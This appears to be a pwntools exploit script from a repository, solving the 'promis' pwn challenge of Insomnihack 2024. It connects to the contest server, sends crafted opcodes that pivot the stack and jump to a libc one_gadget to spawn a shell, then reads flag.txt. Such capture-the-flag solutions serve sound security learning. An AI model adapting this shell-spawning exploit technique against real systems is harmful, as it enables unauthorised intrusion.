Files
ctf/insomnihack24/pwn/promis/exploit.py
2024-04-27 03:02:04 +02:00

25 lines
642 B
Python

from pwn import *
context.binary = ELF("./promis_patched_patched_patched")
libc = ELF("./libc-2.27.so")
ld = ELF("./ld-2.27.so")
# p = process(context.binary.path)
p = remote("promis.insomnihack.ch", 6666, fam="ipv4")
pause()
load_long = b"\x16"
add = b"\x20"
move_stack = b"\x28"
weird_pop = b"\x36"
set_val = b"\x56"
p.sendlineafter(b"choice: ", b"1aaa")
one_gadget_offset = 0x4f29e
diff = one_gadget_offset - (libc.symbols["__libc_start_main"] + 231)
code = move_stack + move_stack + weird_pop * 2 + set_val + p32(diff & 0xFFFFFFFFFFFFFFFF) + add + weird_pop * 5 + b"\x00"
p.sendline(code)
p.sendline(b"cat flag.txt")
p.interactive()